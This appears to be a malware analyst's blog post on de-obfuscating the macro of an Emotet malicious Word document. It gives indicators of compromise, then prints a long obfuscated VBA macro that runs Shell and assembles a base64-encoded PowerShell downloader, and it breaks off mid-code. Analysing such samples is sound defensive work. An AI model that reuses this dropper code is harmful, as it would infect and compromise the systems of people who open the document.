This blog entry is going to cover how I managed to de-obfuscate the macro from the Emotet sample that I was able to grab. The maldoc can be found in my Github repo located here: http://github.com/bloomer1016/2019-02-12-Deobfuscating-Emotet-Maldoc.
Indicators of Compromise:
==========================
MD5 of Word doc: 35c716c82f9912cb1a57bf7ee72e0c53
VT: http://www.virustotal.com/#/file/9fb5e5242394557e27ca3ccfc492f7db0f7474662148a8797953df702b4d78db/detection
Any.Run: http://app.any.run/tasks/0e428667-3602-489f-85ac-1f022e2c9c1f
Analysis:
=========
So to be honest, I was using this maldoc as a case to try to get better using oledump from Didier Stevens. This all stems from his latest posts on the SANS ISC blog (http://isc.sans.edu/forums/diary/Maldoc+Analysis+of+the+Weekend/24626/ and http://isc.sans.edu/forums/diary/Video+Maldoc+Analysis+of+the+Weekend/24628/). Unfortunately I was not able to get this maldoc de-obfuscated as easily as I hoped with his tool. The closet that I got with oledump was the following cleaned up obfuscated code:
CMD: ./oledump.py -v -s A10 /Downloads/Email_zip_file\ \(1\)/attach/secure.accounts.docs.com ----- Attribute VB_Name = "sKfw6m" Function DsiufjK(rPP1jAE, wToiPvr) On Error Resume Next J5UUuW = 123061037 + Rnd(113821029 / ChrB(781545532)) * (KOOBJ15 * CStr(nCU1DV) + (721212395 * 935778426 - dw9RbQ * J3aLT4S * (nBmZw7Zd + ZQYnLzp))) Set L7zuIbtj = mahsn85 V9NaRBp = 95561692 + Rnd(957947317 / ChrB(117312524)) * (J6n6Ni * CStr(a7EBBTk) + (63234899 * 42872721 - ovAu45 * Dr73V6D * (i1ShnPJd + V9blDk))) Set bLLuAm = piEtG96 kobw56 = 545927644 + Rnd(581946775 / ChrB(607181138)) * (wRoKibm * CStr(sqHIXs) + (282809907 * 875422380 - trm3QUi3 * bCq8sa4 * (YKQibW + QYLnppq))) Set RYXzEjY7 = zKa8wzwa Shell (rPP1jAE + iJf1R0 + jG4Ranf + rppKckZK + oM1fQI + nRaN1qpw), l6dXY99 + qnul14Cw + wToiPvr + tzKhPcU + tm0T1td + zEB7op fdESF6 = 575508045 + Rnd(683532192 / ChrB(303497533)) * (jLUuzP * CStr(lIzzDBMQ) + (663769490 * 515866827 - KSjEhYc * TENapKzS * (m3KmGvq + uo5K85))) Set iQMazZ = DmWY1X oERpw3 = 383717547 + Rnd(399915385 / ChrB(399256710)) * (vYRhKH4D * CStr(B9GMwTU4) + (603348749 * 303774170 - TjNsOt2S * zBCsvH9l * (QhuGLcAj + p50LBuT))) Set ILNXV9EK = K6AMEYz zqCBZXJ = 548079610 + Rnd(771197523 / ChrB(751962899)) * (Du5G9N6 * CStr(BSd5a4w) + (480523241 * 29726740 - o1MoXz * qzQ3DrzY * (fwQ176Yi + ZXEtUllN))) Set lL0EPw = VNmiUua End Function Function UOiYERH() On Error Resume Next H57SuvkQ = 580923321 + Rnd(794405036 / ChrB(922132672)) * (iHzCJs * CStr(zkV9Dr) + (519194540 * 72757858 - cICcc6 * a4LjrPRR * (K9mTHvMT + kEEMhk))) Set GLp2RS = rW4GqwY KlUqpAq = 17708137 + Rnd(707881123 / ChrB(51263178)) * (rkjuGi * CStr(iCHtLi) + (148797801 * 336525818 - KSsCzQFh * rA7lri * (SLD73usJ + ZG1VV11))) Set pzQpibN = FjBrRP0 OsiXQFj = 338100754 + Rnd(445330114 / ChrB(702107231)) * (MuhpkGrG * CStr(bw2KXm) + (80762172 * 499341496 - GRZjvF * ajdzrC * (PLupjYWF + bFs7P7Ci))) Set S84fWnku = EwQXT4u0 QX0ipWjQ = "wersh" + "ell -" + "e J" + "ABIAE" + "wAMwA" W4muYS = 611167433 + Rnd(614748696 / ChrB(781594660)) * (fuPfln * CStr(U9AvEskE) + (858642824 * 260979276 - sKmAZGO * DOJJvP * (RZSJpVV + cBzNuV))) Set RbIPGfZ = Qt1lSdB z3w9zn = 993073110 + Rnd(741779901 / ChrB(334354848)) * (MFXjaSK * CStr(V9rjsAwK) + (507201983 * 373487450 - j6hCWJ * jFlicO * (ukifDb4 + OQw2wO))) Set ZlJ1dEIU = QXIEdF qYGMCi2F = "zAFIA" + "QwBS" + "ADA" + "APQAoA" + "CcAS" TzUjia = 565698346 + Rnd(225118524 / ChrB(638188131)) * (cK5zSF3q * CStr(S1p6uJCo) + (653494707 * 327994882 - G3Gw7P * jrWE1NS * (TEHwLC9 + mQjj0A0))) Set BsdJmv = hikFh2 CzSFDc = 632134329 + Rnd(86595323 / ChrB(830203560)) * (BoAkuO * CStr(KqZVRq) + (609165067 * 436608025 - qzwQMo9 * Ds9O9z * (f7ivcUh + hbBYbBR))) Set ZivcVm = zVOcbh ZzzVfP = "wB2" + "ACcAKw" + "AnA" + "GQATAA" + "nACsAJ" + "wB1AHA" + "AcgAnA" + "CkAOwA" + "kAEo" TXKcPvDT = 236589529 + Rnd(877971834 / ChrB(388169523)) * (HBiw30jH * CStr(Jh1rBfNz) + (444691419 * 228218004 - Vt2tHnq * uE9Q2ijN * (dwp05YEB + C7Ejol))) Set H33aXtRd = IAnmCRo Cbnwmb = 446275897 + Rnd(161868866 / ChrB(164012177)) * (PUEsWO1U * CStr(cuTsqawk) + (616637866 * 634967740 - qMjIhdQ * ZVuL4D * (jBbQLir + wAojhi))) Set a2INrWDt = UihzXE r98HzMT = 581348660 + Rnd(53715188 / ChrB(897420664)) * (pKU2LKi * CStr(ss2kNT) + (274942974 * 701914311 - lcFmn9Z * rpVWYKj7 * (i16IL9QG + tC3HXrK))) Set k3vnwMn = YaqXc8R zVCl3I58 = "ARwBU" + "ADk" + "AaQBZ" + "AE8A" + "YgA9AG" + "4AZQ" + "B3AC" + "0AbwB" krRqwkL = 115930249 + Rnd(367062198 / ChrB(963166020)) * (wfZ4XkYu * CStr(W0bjcfVR) + (255655955 * 972165962 - iRQzY7D * cujvkVj * (F3VrQRP + jvFrFn))) Set GnhMcrXU = su2Jvl FLio6M = 559670781 + Rnd(548770074 / ChrB(838715768)) * (nak9lG * CStr(RA2fnU) + (447465294 * 450247896 - dLB40O * XtuhFih * (IVdl1i + LPp2Tdud))) Set mE2bV1 = bbw5X89 fcsnuE = "iAGo" + "AZQBjA" + "HQAIAB" + "OAGUA" + "dAAu" + "AFcA" + "ZQB" + "iAEM" m14DVL = 572995062 + Rnd(682774435 / ChrB(713694484)) * (CnNPstY * CStr(lidlnh4I) + (32789883 * 481696362 - LPpdlNFj * WIBfdvn * (bucYLWRZ + WoO32w))) Set oHfTsPQ = iHEHfOk maFmfhG = 382677825 + Rnd(402723107 / ChrB(567869187)) * (hiIL3p * CStr(NpI7Q2u) + (246140479 * 273502882 - T5fznjK * RiDVzIz * (XqibVSES + hw2GiJ2))) Set nfmrcr = fwHIETcw cNsVZwis = "AbA" + "BpAGU" + "AbgB0A" + "DsA" + "JABQAG" + "YAdwBI" + "AGMAW" wQEJF5C = 910857363 + Rnd(735772532 / ChrB(646045182)) * (EKvQVU6 * CStr(JwMTOfsV) + (302030066 * 761120045 - Q7stFCpH * zEVElaMR * (Ztzb3z1Z + W3zwwOD))) Set PPvXfz = I4RJBwZV MMwCzQk = 635618321 + Rnd(211664598 / ChrB(172405967)) * (cHhmFk * CStr(JzqwIkPU) + (835699373 * 889928129 - mvQaXAB * YVWJFp * (ULcwHd + w4OBQzT))) Set Rw1HOF = bsdTpC58 spHYft = 787943675 + Rnd(503285352 / ChrB(823021615)) * (GGSl8Djp * CStr(B43bwAH6) + (434043747 * 881188666 - wOGjjlQK * i9RvNSj * (D3UwvO8 + jjYKOUID))) Set Y6Zk7kO = CwwZfO SomS25ZG = "ABaAF" + "MAPQ" + "AoACc" + "AaAAn" + "ACs" + "AJwB0A" + "HQAJw" + "ArACcA" ndWlmv = 950216595 + Rnd(508699961 / ChrB(660160967)) * (Q2Fw5w4 * CStr(YCZiDDBa) + (166636103 * 591485776 - MF5EAuBr * LR1CllA8 * (zZwrE3hi + RE2zEwK))) Set B3NdjzHn = VaNB5sz PZBhBY = 432847934 + Rnd(740372105 / ChrB(341720823)) * (bErf4p * CStr(bqF0hm) + (687029270 * 950393171 - ktTliuB * NnGj6f * (zzZwcr + RMad6V))) Set MnXz7k8 = dRoaHKd GNc88i = "cAA6A" + "C8AJwA" + "rACcAL" + "wBk" + "ACcAKw" + "AnA" UOiYERH = QX0ipWjQ + qYGMCi2F + ZzzVfP + zVCl3I58 + fcsnuE + cNsVZwis + SomS25ZG + GNc88i End Function Function B8waSCi() On Error Resume Next XwR36w = 740956857 + Rnd(869941583 / ChrB(530943620)) * (tSr33Iti * CStr(IXD5ru) + (825502236 * 225898445 - pD1Vsi * PdKbEz * (cwiQM4f + WO9OB5))) Set JJzcVKY = KwHsSPZ MnccV7 = 961190641 + Rnd(579445124 / ChrB(898137460)) * (Tmn4GCm * CStr(dPqURfh) + (903131872 * 722011649 - a4HzPP5 * YjjuY917 * (V5tnn08 + rZD2Sv))) Set awo2HUu = j67Tpk mm44hw = "GEA" + "JwA" + "rAC" + "cAZA" + "BhACcA" + "KwA" InO4O3Nf = 199648397 + Rnd(456529921 / ChrB(252932517)) * (S90uLjr0 * CStr(YT9qV8) + (203543474 * 467348574 - rCHVfI * zEmhoS * (ztRZFzp + iQL3i00n))) Set Q2nOCq = Wr7pq9 zcdKINwA = 305479612 + Rnd(453469133 / ChrB(364375221)) * (rcR0ckR * CStr(kpP3jv) + (140260638 * 45658419 - ti19I9zw * sjorwO * (cHlYw3u + NrA3Qzj0))) Set YJAowB4O = cESKof Or9bom = 801021977 + Rnd(593364666 / ChrB(394078277)) * (uu9tbvb * CStr(lWwHzjQu) + (182045760 * 66368653 - qu16Wil9 * LVjHmpjp * (izZ532n + CZU8sE0))) Set EQ1Vj5Jd = ulNjnBKB o8NUEiH = "nAG" + "YAYQBy" + "AGkAb" + "gBnAG8" + "AcwA" + "nACsAJ" WVGzsPp = 794294215 + Rnd(739163166 / ChrB(69831388)) * (uwT00uz * CStr(Lk18UDwV) + (742897564 * 330744520 - YFs2vkBA * V1MHPzp * (oQjNuP3 + uc0tkz))) Set fIOKvUWz = nMz0pP KzY2MmM = 871634362 + Rnd(506657181 / ChrB(584139411)) * (iYBN4f * CStr(p4wT1YS) + (718321847 * 645022795 - m7YRzA * j2LwYpP * (PXoLZXl + EAwTiO))) Set fOLHNN2 = ZlEYnl H0UFlvcY = 368496449 + Rnd(755538298 / ChrB(4852398)) * (SppvEM * CStr(A5bEt7C) + (48005019 * 485850505 - IHnvpZrs * Il9f92 * (zTSiNHE3 + qZV3BTQG))) Set AWXdXU2T = mFUMiaY jzYz573 = "wB0A" + "GEAcgA" + "nACs" + "AJwAuA" + "CcAKw" + "AnAG" + "MAJwAr" + "ACcAb" Ss7dvFBj = 658707985 + Rnd(741460773 / ChrB(863073318)) * (f0H93w * CStr(tzAuJLs) + (103099660 * 527807294 - UjYoVM * nwzw75 * (p3VjD9 + v7tl5TZ))) Set lfpMUw = ljzC0Ezl u0sop6jn = 669096961 + Rnd(367437000 / ChrB(234394384)) * (jBjHPvh * CStr(EVDM8Rw) + (997570283 * 857621762 - kruGpMB * KIVzji5w * (VU8X4Xk + PwpfzJt0))) Set XCujCT8 = hYX0KZ J6EaO6 = "wBtAC8" + "AJw" + "ArA" + "CcAcgB" + "0AF" + "EAdwBU" cfWDMuO = 561080402 + Rnd(307034837 / ChrB(452682044)) * (lRkuXEFd * CStr(Of7DVN5) + (121958036 * 686562204 - rusNANjM * NrkZTf * (iYUjEO2 + VBoLvw))) Set b3jW2fRs = pWoBr5 VSNjYf = 938352640 + Rnd(281385414 / ChrB(305682240)) * (p34Ruh1 * CStr(MUvAh7tT) + (680785701 * 180003934 - GOUWj2O * F1UNhOLI * (AJUzFhN + nmlHOMp))) Set wNpl49I = o0siL5z Xqms33DF = 860284994 + Rnd(816974520 / ChrB(432755606)) * (BUSGn3 * CStr(jF1vo4k) + (283074538 * 474804983 - t0ZjrX * nfwzUlsF * (ssR5Uul + L0czXdT2))) Set nktm8wJ = bK7wwn woo96Zz6 = "ACcAK" + "wAnADU" + "AJw" + "ArACcA" + "NQB6" + "AEAA" jhoci1Oj = 249824459 + Rnd(385038570 / ChrB(802697655)) * (isaVuW * CStr(wjRU7A6K) + (138134194 * 991762995 - O35wi7 * qiNqQO * (ST6Ph5r9 + f1TVGY))) Set zswl1zw5 = SlErsJw RqSbml7G = 493294547 + Rnd(941951185 / ChrB(107727560)) * (Ej9pZi * CStr(DtTb87) + (470117345 * 906077628 - DJlhdMA * f8CEo1H * (VRknGtP + AoodLHSC))) Set cGvo97v = iok110 XcutWDO4 = 590959662 + Rnd(964447523 / ChrB(72472530)) * (uiA0JR * CStr(zYmrDH) + (414704443 * 283378948 - b3zjv2p * RpDO00 * (QCN0Az + CHCT6wl))) Set cvPTwI = DcY7Knrq zpfFBH = "JwAr" + "ACcA" + "aAB0AH" + "QAcA" + "AnACs" + "AJwA6" + "AC8ALw" + "AnACsA" qPSOSzr = 273662946 + Rnd(301592405 / ChrB(403393355)) * (kciM5LYD * CStr(P1E8JAS0) + (476476745 * 936633883 - NIX2dJn * o8oVG23t * (iXJ8cKU + wT6lTHMV))) Set kOaOuf = fDIaPFj lV7a7Wih = 29791594 + Rnd(330322809 / ChrB(49106137)) * (RKVHZp6Q * CStr(jUa7Lf) + (410399670 * 571741316 - UbhYIwIs * KBDWSMN * (JJa6TQ + VSCmvli))) Set j79mjMpL = OEn0RGj bOIDQsaj = "JwBm" + "AGkAJ" + "wArAC" + "cAbABl" + "ACc" + "AKw" njDMcZ = 65144999 + Rnd(867128970 / ChrB(155940769)) * (EWFUh5t * CStr(mEOimR) + (672095181 * 533618897 - OrKJ9jLM * BtkjPpK * (VMFtFWq + iKtjAdY))) Set KGuWrLXF = kS8HfCb EpfAUYB = 151644257 + Rnd(98819593 / ChrB(942538894)) * (cOPXaFlZ * CStr(CSY3wLKC) + (910136498 * 254367424 - mwKEdWjI * RTmMDBh * (jXPmMl + r0DCSKk))) Set LWmO17i = EQkHJisO J8cCvsJ = "AnAC4" + "AbABhA" + "HUAYQ" + "BzAGk" + "Abg" + "BoAC4" + "AYwB" + "vAG0" B8waSCi = mm44hw + o8NUEiH + jzYz573 + J6EaO6 + woo96Zz6 + zpfFBH + bOIDQsaj + J8cCvsJ End Function Function BIBrlzL() On Error Resume Next salW3cd = 897688160 + Rnd(173242530 / ChrB(572437022)) * (Gzmr88 * CStr(s5L1Fu) + (505833081 * 87354455 - k22CKl * zK8kYkk * (Vi736d0p + nRI8Yo))) Set zJFmAjVA = OflPaw SVSj7IL = 498493456 + Rnd(257208968 / ChrB(175405816)) * (sOQj7ssG * CStr(i86MMLzA) + (133236746 * 143755478 - WobX5lw * EXHKbEB * (fmKovU + wArPCcaW))) Set EizGRqS = pBuGvp1 LvY3XP = "AJw" + "ArA" + "CcA" + "LwAn" + "ACs" + "AJw" sdbVwkcl = 994524332 + Rnd(220288436 / ChrB(179756893)) * (IfrPWDOt * CStr(YipZKP9S) + (717361710 * 557880855 - bvJuusS * k3RvKJXm * (AAi9wGK + B6c26w9))) Set fSfbLN = Uo0Fkpw9 ankR7E = 139855470 + Rnd(657506679 / ChrB(209285051)) * (GTcMEiE * CStr(DR6qaozi) + (403650313 * 120336883 - ws9WibA * sU48jtPl * (iM5PNs51 + hPF6AJ))) Set rjHESDN = l46i4l Dcvnnls = "BQAC" + "cAK" + "wAnAF" + "gAZQBo" + "AEwA" + "JwA" + "rACcA" + "UAAnAC" DQRBBiZ = 129612578 + Rnd(158530774 / ChrB(979388377)) * (cmZZj5m * CStr(TO4qOPa1) + (996308587 * 268788261 - JAfOvvk5 * XGC7UDP * (vlhqBYUz + OKs3sXm4))) Set GCaYBwwo = TkNfSEoU Mud3Tm = 254708547 + Rnd(546893607 / ChrB(656376276)) * (VuujdIqE * CStr(CVvKYK) + (679619170 * 309913694 - LmKFnp3K * Z4o4zcv * (OMa1BMZ + wbjOi7mw))) Set wzPfmPsI = T6Z043hw rfHzP8Z5 = 779452360 + Rnd(314524005 / ChrB(434963530)) * (QBz6aLW * CStr(mO98tV) + (75953258 * 777698624 - rk7MsQBp * zpKVk0N * (VzwAjv31 + EzAvkK))) Set qEpZfjR = DnXtHl Bkabza = "sAJwBQ" + "AGw" + "AQA" + "AnACsA" + "JwBo" + "AHQAdA" zziwRDBb = 705064820 + Rnd(15520999 / ChrB(155267771)) * (LfJvfTt * CStr(LCjivZa) + (655770653 * 621557200 - sH9Ek4 * LYsCkwh * (aPsiiikc + OlADY70d))) Set ELl3QD0 = wsOKsJXf iSwATJ7D = 117721301 + Rnd(410169800 / ChrB(903695667)) * (iHJ6jJ * CStr(Gwo54j) + (14831678 * 668017117 - JFRvLWjw * WkA7M3NM * (u8XkhiJF + wX1bsWB))) Set pZu1ishz = BVzZbEOs AtDAi4 = 79192877 + Rnd(356646810 / ChrB(193150959)) * (aoA2az * CStr(LOb0jNM) + (577273781 * 10214071 - RwhbP27 * fkaCrop * (FlFIbj0 + bzRTE0sZ))) Set KvAiiVzn = P2hzC5v wbqHZhV = "AnA" + "CsA" + "JwBw" + "ACcA" + "KwAnA" + "DoAJwA" + "rAC" + "cALwAv" + "AGEA" SN9EOt = 400801773 + Rnd(706481524 / ChrB(212746292)) * (pJzzDbE * CStr(BVihzT6f) + (537372501 * 220808891 - FivJH6WF * fmLmiPa * (i3F0Bp + vz4K0r))) Set iBq7fsTh = wVLvqEDA kpApXD = 162495480 + Rnd(792398794 / ChrB(649698527)) * (ZjMwL1wW * CStr(avAOshlF) + (509792796 * 554562066 - uFzVoWK * Rzr8ih * (fSoYIL + WofirI))) Set CqGBzLc = iK6TRK0A QrPd0du = 571751711 + Rnd(596249814 / ChrB(290889878)) * (Nm3GRu7 * CStr(srhXaJ) + (720783157 * 982961732 - jilpU4 * pbrP9z * (ZHA8GhwP + lFiTBk))) Set cEp8iMGk = dlsrvl nDv43V = "JwArA" + "CcAbgA" + "nACsAJ" + "wBn" + "AGkAcg" + "BhAH" Z6swz6 = 439748052 + Rnd(831622495 / ChrB(404758131)) * (iT1dj2 * CStr(OsV0Oabj) + (823614072 * 607952038 - WQu1kdF * rXimkRB * (HACk4iI + SXWmNtF))) Set iA4Fw5c = pWoIZ2T n18jT6 = 952144196 + Rnd(230294134 / ChrB(425223701)) * (E63TCnf * CStr(wHztkj) + (400904022 * 632467969 - r5jZ1T * tbVUAIDU * (w1PIRBKm + zwjT5J))) Set cfBAB1m = hHopPJro Qss2NEcF = 361089100 + Rnd(965824406 / ChrB(716103464)) * (lj2OjV9 * CStr(POAaPUz) + (982453181 * 801390467 - JtiF4C9E * NiRcvtJ * (PMM8Zd + qIRXKNHd))) Set oUjW4J = jt9iko rWLso0 = "MALgAn" + "ACsA" + "JwBv" + "AHIAJ" + "wArAC" + "cAZw" + "AvAH" mtz3DZX = 962115688 + Rnd(186144534 / ChrB(171845330)) * (AVs08A * CStr(SolOHZ5) + (162493122 * 948977706 - wSzPGBW4 * WOADo9 * (Ii8ISBE + noiNApK))) Set KFl8kGmS = iLda4zw caBTAmqM = 871765078 + Rnd(707258343 / ChrB(507267468)) * (BIp99Gz * CStr(ojjioYnr) + (928811235 * 513266027 - TMfp2vfS * QAU746 * (LMEunc + wSjKw0w))) Set wKTGVRT = MjOrirqr jiC3ZwNt = "gAJwAr" + "ACcAOA" + "BCAC" + "cAK" + "wAnAG" + "oAYQB" + "NAC" + "cAKwA" wM1jwl1h = 80999420 + Rnd(445577673 / ChrB(144647992)) * (WwFwvU * CStr(j2jZNZ) + (404611844 * 802660200 - LsmdTW7P * toRX6I * (N3SzuzRU + fLbt7d))) Set Z9cs2f = KCjJiE SAuc9T1G = 521046457 + Rnd(991904743 / ChrB(334991763)) * (UkjtcWo * CStr(EwKCdiA) + (338337561 * 636398123 - ZuYfKj * UfLN9mE * (iVwNz1 + P71SGLWw))) Set hMDi3m = A4jMZYw NknRZU1L = 947509473 + Rnd(456253818 / ChrB(316982394)) * (sQ5fdSQA * CStr(QziCoroP) + (280977523 * 226482944 - wTrLE9 * JiofpJ8z * (rw42Ub + JdRMCs))) Set RlwSOSRm = J9Wfuzh8 NpY8wL9 = "nADQ" + "AJw" + "ArA" + "CcAN" + "AAnA" + "CsAJwA" wl7PnKt = 339086241 + Rnd(587795483 / ChrB(159454497)) * (mYKEPfo0 * CStr(zU8Tljd) + (914514087 * 730759206 - QwMOQ3X * vmLtvn7 * (bG6CaomR + K2pa5Ra))) Set s0mQm4nT = c9km8M GM27B0 = 935041082 + Rnd(773137296 / ChrB(937261156)) * (u86X8k * CStr(YCFSEMc5) + (102353533 * 556183881 - Nv6tXkGS * riO5GR8C * (zPaFC4z + DzNXqvI))) Set AWdnMr = DKFL8E9 Shl9iw = "0AEkA" + "QABoAH" + "QAdAA" + "nACs" + "AJw" + "BwACc" + "AKwAnA" b8tqLvh = 740872502 + Rnd(958053801 / ChrB(844614177)) * (wYNlRjnA * CStr(w0hCqNHG) + (278944652 * 239573739 - tJIFBLE4 * IVMK0jm * (bzzBtJI + f2jI8J))) Set XMhb7s = rLzfOld Ujzz0k = 496985461 + Rnd(963076803 / ChrB(572193659)) * (NzXiwwP * CStr(IAwXoj) + (937109883 * 110568400 - lzdUG7v * RiSFzhL * (M99kQf + mZKZoXz))) Set swcRlCaw = s601d1s ivOPAV = 947449998 + Rnd(912092045 / ChrB(427464764)) * (pfbuo5j * CStr(dPYOPU8) + (577691146 * 752099965 - lXm0KRW * U5kS64r * (hbWv1f + z0pYWJu))) Set V4cjWiA5 = iFTWmkT zhGozS = "DoA" + "LwA" + "vAGEA" + "ZABzAH" + "UAaQB" + "kAGU" BIBrlzL = LvY3XP + Dcvnnls + Bkabza + wbqHZhV + nDv43V + rWLso0 + jiC3ZwNt + NpY8wL9 + Shl9iw + zhGozS End Function Function wBuzmLiw() On Error Resume Next vNrK59 = 956706527 + Rnd(818839896 / ChrB(796694744)) * (NHaPKlrO * CStr(NcdZw8Mj) + (337452864 * 740566261 - cskorLpR * C8fChbIh * (ZVovNvI + Pcwfijro))) Set ajPlhZj4 = nYzD3RM lDoFh0l = 472973831 + Rnd(808105059 / ChrB(834895767)) * (winr3f * CStr(JmAJACGd) + (874977290 * 543129242 - jWY6wzKs * OBIW9RhL * (XGRFCiE + GlQrNhmG))) Set CVTLiV0A = q7rUkb PnSizzU = 213939234 + Rnd(774407036 / ChrB(371253078)) * (LI11W9 * CStr(boSXYXZk) + (766663396 * 408958789 - nsdUNPA * YrQMQb70 * (HqS2oV + XZtbWU))) Set ZpfmH9 = D8CLH6cl qc2z0SEi = "ALgBjA" + "GwAJwA" + "rACcAd" + "QBiA" + "C8AeQ" + "AnACs" + "AJwA3A" + "CcA" lbU0oKiJ = 988155962 + Rnd(209797982 / ChrB(816298229)) * (SLM5jYVq * CStr(AV1tQoa) + (744496409 * 566978797 - tp1aiXp * ozZlwlkB * (cGHGTow + ZjcPYU))) Set SiCAqcz = wO6oEY IIfvfQ = 126723074 + Rnd(435246359 / ChrB(239927486)) * (Iwb2OvdJ * CStr(pmHtUpiO) + (274313895 * 667423204 - wT9PHuL * Dj4lNf * (fPAbJWjY + fnM8nA))) Set G30ot8Gz = LHHKRj ZGimFT = 448910842 + Rnd(975006233 / ChrB(902959419)) * (DquEND3h * CStr(qRtwwj) + (694330149 * 839966900 - UQmifl * itIzz8 * (QDciJik + qvzTtuII))) Set pDMjlAz = uBbvvW Oujhvq7b = "KwAnA" + "DcAUQB" + "UAEsA" + "aABW" + "AEAAa" JNkiz3t = 972918120 + Rnd(62913320 / ChrB(675933919)) * (TLltLFr * CStr(vq5uWh1) + (117545973 * 552808295 - uJlddw * KHUJTIK * (wXkuX1Qh + WU42fp1f))) Set GQWRRib = fmMMHLK LhWNjJ = 422361797 + Rnd(825988100 / ChrB(960446742)) * (unQbwl5 * CStr(RBHvYS5) + (371852211 * 669689825 - SbnCHit * VBGmPuw * (Mfj3rq + fzQPDJs))) Set XANTP2 = JT6ffnd QV7zAXF = "AAnAC" + "sAJwB0" + "AHQ" + "AcAAn" + "ACsAJw" + "A6AC8" ccEjDY = 754402666 + Rnd(918619055 / ChrB(332129654)) * (oOdci46m * CStr(iGQzdXZn) + (365204995 * 167486757 - T9LUVwT * iZZ3O2R * (JoKf8V + iBUR82LZ))) Set OKhJTRZ = s7OjIwG0 IoDhaM = 680309150 + Rnd(409541587 / ChrB(272583767)) * (w77M0s * CStr(KIOUAj) + (230196283 * 737336328 - NojRw9VK * Qcrz7p * (onJOQb + vUD9Mc))) Set BDpnH92 = J1tabXUz BzjlMR1F = "ALwBt" + "AGkAY" + "wBoA" + "GEAZQ" + "BsAHc" + "Acg" YEZYKz = 484079901 + Rnd(856252385 / ChrB(453031564)) * (ni7woC * CStr(JKCbiHz) + (524843583 * 525322135 - Q8appC1 * fAi2So * (QLbYIcd1 + vRXR8Jz))) Set R3RuzH = JlKI1m d1qKOZ4 = 569587438 + Rnd(40491157 / ChrB(795065016)) * (XuzjUS * CStr(DZd4Q6L) + (484350220 * 264894368 - EOzuWb * XPiDk4 * (CJoPjWcj + p4SNZS8))) Set Fo0dE3BC = S3AzFJU OQKf7zP = "BpAG4" + "AZwBs" + "ACcAK" + "wAnAGU" + "AJwArA" + "CcAcgA" + "uAG" + "MAbwAn" iPajiivw = 758049099 + Rnd(29968186 / ChrB(84134420)) * (zpJCJLqM * CStr(lPirktdA) + (454640686 * 979235537 - Ysphul * Gw2Kmaf * (kLvlUrR0 + CRBnzS))) Set WXlbEj = vYXFJN6J JJBzKd0 = 533760493 + Rnd(204798771 / ChrB(972421293)) * (NRAdWzj4 * CStr(kjTTa5sC) + (597516013 * 796959116 - EZXt08 * WTW13z * (DhjJtWb + rDFwKXL))) Set KkGm1lzt = IdblLF9 aUmOd6IY = 813499503 + Rnd(892580030 / ChrB(229282420)) * (RSLoKM * CStr(S4zDjIX) + (92456921 * 676503421 - VVCFZLfI * DUdaRK * (ZlrvMJaz + ouTITP4r))) Set ncoDSN = SnS9SVL ds84PI = "ACs" + "AJw" + "BtAC8A" + "SQBSA" + "FkAWQ" EnFmNMk = 158944847 + Rnd(495498364 / ChrB(317397199)) * (Odn3lV05 * CStr(Ho8sazts) + (643924693 * 122337613 - nsBzvw * iPdW9V61 * (Nw0Ria + ozZwp7B))) Set v2vjLAoO = itE24Z s53wzV4 = 433634640 + Rnd(637973148 / ChrB(324097061)) * (QL2bUcc * CStr(Qr7U65E) + (601877437 * 277611535 - wQEmdcQh * C8fzwrY0 * (ppDhM7 + WzzWsRhD))) Set w3L5Mi = WjGMplSZ bZjAXG = "AnAC" + "sAJwBx" + "AFAAY" + "gA1AC" + "cAKwAn" + "AE4AJw" + "ApA" + "C4AUwB" zJaNqwG = 899556606 + Rnd(323850921 / ChrB(502299257)) * (ZBRanD * CStr(HPwVsmL) + (866253917 * 206154605 - kCATQD * CVNSNDan * (TuAQTSt + aDnOqP))) Set GirAX8IF = zlSR9ojz w8C6ATj = 241659996 + Rnd(221131664 / ChrB(67853889)) * (i9Spcmnn * CStr(GYHS4bwL) + (941622527 * 173833504 - cPNYlMB7 * Zzl8sa * (PItCzo + VHcBHKGr))) Set WDAal7 = uTr7tW lsk59K2 = "wAGwA" + "aQB" + "0ACgAJ" + "wBA" + "ACcA" + "KQA7AC" + "QAa" + "QAw" KLPzsmr = 338153119 + Rnd(235357777 / ChrB(298636519)) * (bEp1Ja * CStr(S9RcLCBV) + (489922374 * 216470377 - Ti45Ca * kkpPUapz * (MHuHRN5z + fV1Bzc59))) Set qs9vBvSC = TNXf9YRP tXsOkA = 610084019 + Rnd(501257081 / ChrB(868022676)) * (JzOPLhAY * CStr(laT7L1dP) + (771486829 * 751382428 - rGbF8Pf * qX59YshP * (lwHJ7YS + HPFMIz))) Set pFku4j = CZ9zH6A5 MzvEWt = "ADUANQ" + "BhAG" + "wATw" + "BQAD" + "0AK" dLH2l3 = 483458888 + Rnd(225844508 / ChrB(860698071)) * (H2cI5E7 * CStr(hMXBjRrT) + (286274657 * 198493336 - VPoPcU * lCcOsj * (FO4wLtWW + RULK7p))) Set llz3cu = GltJTA j29Ibk = 628709120 + Rnd(937903414 / ChrB(301295133)) * (NSZmmzz * CStr(I3f6tn0) + (970414523 * 752346545 - hCjjXr * mzS0sTiz * (r4kY03 + CZwkoLT))) Set LvzP6WDP = uzmOzzo6 CSfGq3 = "AAn" + "AHQAcA" + "BZA" + "EUAM" + "gBvACc" + "AKw" s30bZv = 323743509 + Rnd(971962241 / ChrB(573005648)) * (zdtWJ6K * CStr(DVh498) + (840601367 * 509444007 - B7W2DV * q3UoFSil * (Qhza9A + RFdb6wv))) Set ZmmqAUOW = UPPYX2jL MR7BGw = 599233617 + Rnd(898967321 / ChrB(769829978)) * (ZrrcTkiE * CStr(EkHTrLXt) + (661800549 * 658446957 - Gj1Dk6M * mYC4rqf * (DdKQJrwr + LJGmEAk))) Set NAn2XiV = VAf2Kz jwlnQu = 591392880 + Rnd(219462055 / ChrB(442769878)) * (njbzqXI * CStr(NqIEHw) + (220029654 * 987614661 - z67lwo * wY9RiC * (cjLlw0L + Aojfchlm))) Set jz8mIMP = C0LG9pQ sXIO3j = "AnAG" + "0AMQ" + "AnAC" + "kAOwA" + "kAE" wBuzmLiw = qc2z0SEi + Oujhvq7b + QV7zAXF + BzjlMR1F + OQKf7zP + ds84PI + bZjAXG + lsk59K2 + MzvEWt + CSfGq3 + sXIO3j End Function Function Mnv94H() On Error Resume Next aYtibs3 = 179827747 + Rnd(282625438 / ChrB(637411799)) * (mKzDvwPf * CStr(koOwWQ) + (820843991 * 289415028 - JjFdDd * lHfAVqz * (RPNVIV + DPpWlW0p))) Set JFU0SS4 = jrTi9a lUWofF = 74927613 + Rnd(641543024 / ChrB(758132513)) * (UIV49I * CStr(rjh9sN) + (7144871 * 